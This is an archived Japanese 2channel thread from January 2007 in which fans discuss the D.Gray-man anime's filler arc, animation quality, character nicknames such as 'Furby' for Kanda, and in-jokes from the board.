この穴だらけの原作からしたらホントいいことだと思う。

156 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 11:46:44 ID:wLzxdf3j
原作も面白いと思うし大好きな作品なんだけど、ストーリーに穴があるというか
ダイジェストや総集編みたいな流れなんだよなぁ。
アニメは、漫画で省かれた細かい部分を見れてるって印象。

しかし2月から吸血鬼編が始まるとはいえ、いきなりラビ出番なしか。
登場したばかりのキャラだから視聴者に印象付ける為に
ちょっとは出番あるかと思ってたんだが

157 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 11:49:50 ID:zL4q0oRm
>>156
ラビは本編に戻ると出ずっぱりだから、今のオリジナル展開は
これから本編に戻ると出番がさっぱりない神田の出番確保のためと思っておいていい

158 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 11:59:38 ID:wLzxdf3j
>>157
まぁそうなんだろうけどなw

本編はいつ戻るんだろうなぁ
吸血鬼城を原作の長期任務に絡めない事も可能だと思うが

159 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 12:09:43 ID:jIsgvdAo
最初制作会社トムスってバレ来た時は皆嘆いてたなそういえば。

160 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 12:31:50 ID:hOax3HV+
上がってきた映像が良いか悪いか、それが重要だもんな
良いの作ってくれるんなら、それで問題ないってことか。

最近割くが崩壊が著しいアニメもあるし、この作品は恵まれてる。

161 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 12:40:57 ID:OE9nn5Z5
初期の崩れ様は何だったんだろうな

ファービーは一週間あのコロシアム?にいたそうだけど、食事や風呂、トイレはどうしてたんだ?
ファインダーのおっさんも

162 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 12:45:45 ID:c5lFHB+k
神田、あだ名がすっかりファービーだな。
ダイバーとかファービーとか妙なあだ名ばかりだ。
戦闘中3日間 食事風呂トイレ睡眠なし
トイレ休憩
その後2日間 睡眠
だったんじゃないか?
その前どうしてたかどうかはわからないな。

163 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 13:37:10 ID:PPE2tzl3
アクマ退治2日→決闘3日→休憩2日とか?
いずれにせよ教団に連絡する時間あったよなファインダー…


164 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 13:54:12 ID:fk2WZ4I5
2月6日から2月いっぱい吸血城の話やるのかね。
その後、しばらくオリジナルだなたぶん。


165 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 13:58:28 ID:OE9nn5Z5
>>162
トイレ休憩無しで3日間戦闘か…辛いな

神田「まて!ちょっとトイレ行ってくるから」
剣士「……」
神田「ちょ、タンマ!タンマ!」
剣士「……」
神田「ちょwww」

166 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 14:16:42 ID:wLzxdf3j
つーかファービーとサムライ7は強敵と闘えて楽しくて仕方がなかっただろうが
ファインダー暇だよなぁ。本当暇だよなぁ

167 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 14:27:44 ID:+47JwxBo
>>165
吹いたwwwwww

168 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 14:59:14 ID:Lhrtv349
そういや何でファービーだったんだっけ?

169 :風の谷の名無しさん@実況は実況版で:2007/01/24(水) 15:00:56 ID:wngEM3Ep
ファービー「腹減ったな」
剣士「・・・」
ファービー「休憩しねぇ?」
剣士「・・・・・・・」
ファービー「空腹で眩暈が・・・」
剣士「問答無用だ」
ファービー「ぐっ・・・」

170 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 16:13:14 ID:k60yiTxK
>>168

>>34-36
>>38
>>42

この辺で神田がファービー認定された

171 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 16:13:44 ID:c5lFHB+k
>>169
そこ、最後のは「モルスァ」だろ!

172 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 16:20:53 ID:JqX5qZDw
ダイバーってどういうこってしょうモルスァ

173 :風の谷の名無しさん@実況は実況版で:2007/01/24(水) 16:27:43 ID:wngEM3Ep
16夜のおさらい
ファービー「おまいにはムリポ。」
アレン「ファービー・・・」
ファインダー「剣士の誇りらしいですよ。プ・・」
剣士「お相手いたす」
<ファービー一瞬勝ったような気になる>
ファービー「ファー・・・ブルスコ・・・ファーブルスコ・・・」
アレン「ファービー!!」
<どうやら相手は傷を回復しファービーに致命傷を>



次回予告
ファービー「ファー・・・ブルスコ ファーブルスコ・・・」
アレン「ファービー!!」
剣士「・・・」(剣を振り上げる)
ファービー「モルスァ」


174 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 16:48:00 ID:c5lFHB+k
やや原作バレ?





>>172
ジャンプの表紙でファービー新団服が描かれたとき、
あまりにも体にぴったりしていてダイバースーツのようだったのでダイバーと呼ばれたことがある。

175 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 17:31:31 ID:Lhrtv349
>>174
神田スレも一時期「ダイバースレ」と呼ばれたことがあったなww

176 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 17:36:33 ID:Lhrtv349
そして>>170トン

177 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 17:42:19 ID:E92ot98p
スレ読んでて意味不明だったが
>>47見て納得モルスァ

178 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 17:46:00 ID:0oV+/K2o
アクマが出るまで間違って名作劇場を見てるのかと思った。

179 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 17:55:02 ID:NG2/76+s
今見終わった、やっぱり原作よりアニメのが面白いな
絵もシナリオもタマラン(*´д`*)ハァハァ…
ただ、就寝シーンでリナリーのカットを入れるべきだと思うんだが……

アニメ制作会社に原作者側から要望って出来るのかな?
「リナリーのお色気は無しでお願いします」
アニメ見ていて、そんな感じを受けるのは俺だけ?

180 :風の谷の名無しさん@実況は実況版で:2007/01/24(水) 17:57:17 ID:rs2ktrE1
もう既に初めて神田=モルスァが登場してから約130もレスされてるのか。
かなり伸びいいな

181 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 18:14:46 ID:b0OpLzcT
最初のほうは顔とか動きとかアニメの神田の扱いひでぇw
と思ってたけど最近良いな
ヲタから苦情来たんかな

182 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 18:21:15 ID:5Dqa1pUa
今録画見た。

剣士と姫君ってのは古典的だが魅力的なモチーフだ。
クラウディアの真意や、1000年イノセンスの謎など、興味をひく作りも手堅い。

キャラもいいな。
あれだけのデカブツとむさくるしいヒゲ大量出演が見られるとはねw
このレベルが維持できればかなりいい感じ。

寓話的な幅を持たせてある世界だから、なんでもありで話も作りやすいだろうな。
そこらへんブリーチチームは縛りが大きくて大変だと思う。

183 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 18:27:26 ID:wabpl22t
顔が整ってるだけで動きに力を入れないようだったら見限ろうと
思ってたけど、今回みたいなアクションがあるならまだ見ようかな
神田ってキャラは今の所主人公より印象深いな、色んな意味で
前の説明一切無しの超飛行とか、ああいう演出は結構好きだw
ケントウシの武器、確かにキクチヨの武器に似てるな

184 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 18:32:19 ID:Zpl/e939
ぶっちゃけこの主人公は影薄いよ。
周りが濃すぎるのかもしれんが。

185 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 18:33:56 ID:ia1FaKUm
>>179
要望出来るケースと、要望出来ない(要望しなかった?)ケースがそれぞれある為に何とも言えない
このキャラは絶対パンチラ無しでお願いします。と要望した漫画家もいる事はいる

186 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 18:58:50 ID:NG2/76+s
>>185
なーるほーどねぇ
原作でもそうだが、どうも作者自身が「コムイ兄」になってる気がしてならない

187 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 19:04:55 ID:wabpl22t
>>184
主人公だしそのうち活躍するとは思うが筒状の武器は
アニメ映えしにくいのかなあと思った。
濃いっつったらピョーーー!!っていうBGMだなあw
あとこのスレのモルスァ

188 :風の谷の名無しさん@実況は実況版で:2007/01/24(水) 19:11:11 ID:rs2ktrE1
濃い。確かに。
濃さでいうと脇役とか、ゲスト出演なキャラが素晴らしい。
なんでちょい役がこんなにいいキャラしてるのか・・・ww

189 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 19:18:58 ID:OE9nn5Z5
あのBGMはやばいw
どんなシリアスシーンもぶち壊す破壊力がある

アレンはお説教係だからインパクトに欠けるのかもな
もっと武器をちくわに似せた方が良いと思う

190 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 19:26:06 ID:9xu3QIJe
>>174
わかった。見るの楽しみだわさんきゅ

191 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 19:29:18 ID:NG2/76+s
そもそもアレンの、主人公たる信念が見えないんだよね
武器や背格好で既にハンディがあるのだから、せめて心情だけはどのキャラよりも立たせておくべきかと

192 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 19:30:25 ID:b0OpLzcT
確かに主人公の武器って本当に地味っていうかアニメ映えしない
逆にラビのイノセンスはアニメに良く映えるなと思った

193 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 19:36:44 ID:gb/wQ6Vi
主人公にはもっとカッコいい武器の方が良かった気がする。
ラビは原作では微妙な武器に感じていたのが
アニメでは目立ってて良く感じた。

194 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 19:37:26 ID:5Dqa1pUa
まあクラウンクラウンに期待。

195 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 19:39:49 ID:NG2/76+s
ファービーはありきたりの刀だが映える
ラビはセリフと共に多種多彩なアクションがある為映える
リナリーは存在だけで映える(*´д`*)ハァハァ…

アレンは……、銀髪だけか……?(ノ_・。)

196 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 19:41:24 ID:Lhrtv349
>>195
白髪です

197 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 19:42:24 ID:wLzxdf3j
リナリーの足技と神田の刀は、ポピュラーな分漫画とアニメのどちらも良いな。
戦闘時の演出もかなり決まってるし。

198 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 19:43:05 ID:NG2/76+s
>>196
ごめ、色盲だったみたい。・゚・( ノД`)・゚・。ウワーン

199 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 19:47:37 ID:OE9nn5Z5
>>166
ファインダーはゴロ寝&煎餅食べながら観戦

200 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 20:35:02 ID:yGvWBPHL
OPの「D.Gray-man」て文字が砕けるとこ、初期と変わったよな?
前より激しく砕けている気がするんだが

201 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 22:03:24 ID:vx3kAOe/
>>200
アレン死亡の伏線。

202 :風の谷の名無しさん@実況は実況版で:2007/01/24(水) 22:12:40 ID:rs2ktrE1
ちょwwあかんてそれは

203 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 22:43:52 ID:c5lFHB+k
>>200
マジレスすると明るさの差じゃない?
>>18
>>26
で比較画像うpされてるけど

204 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 22:54:54 ID:vx3kAOe/
>>201
死んだら面白いよなwww
とこじつけてみる

205 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 23:44:23 ID:t2qD1y/v
>>204
漏れもそう思うwww
と便乗してみる

206 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 23:47:25 ID:I7P/KSPp
面白くなんかないよ。.゜.(ノД`).゜.。
と反論してみる

207 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 23:49:46 ID:Owlc0LuA
なにこのながれ><;

208 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 23:52:44 ID:NG2/76+s
でもさ、誰か死なすってのも盛り上げる一環にはなるよね

問 題 は 誰 を 生 贄 に す る か だ が

209 :風の谷の名無しさん@実況は実況版で:2007/01/25(木) 00:08:47 ID:rs2ktrE1








クロちゃん?

茶おじぃ?

210 :風の谷の名無しさん@実況は実況板で:2007/01/25(木) 00:11:28 ID:CqrtbnZ8
次回の作監はどうなんだろう。Dグレ初めてだよな?
予告じゃよくわからないな

211 :風の谷の名無しさん@実況は実況板で:2007/01/25(木) 00:15:20 ID:RQiUM5KJ
マクロスプラスの作画監督か

212 :風の谷の名無しさん@実況は実況板で:2007/01/25(木) 00:16:36 ID:HVJJZojF
>>208
ジャンの父親(名前忘れた)

213 :風の谷の名無しさん@実況は実況板で:2007/01/25(木) 00:25:24 ID:Y8xoal0i
ラッセル

214 :風の谷の名無しさん@実況は実況板で:2007/01/25(木) 00:31:40 ID:RQiUM5KJ
リナリーの恋の相手?もラッセルらしいが






殺すほうはコムイか。

215 :風の谷の名無しさん@実況は実況板で:2007/01/25(木) 01:28:59 ID:BYYckOSV
New York 1997

216 :風の谷の名無しさん@実況は実況板で:2007/01/25(木) 01:29:13 ID:vq5QX1IW
>>212
ジャン…えっと…父親の名前ハボックだっけ?
そんなイメージがした

45 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)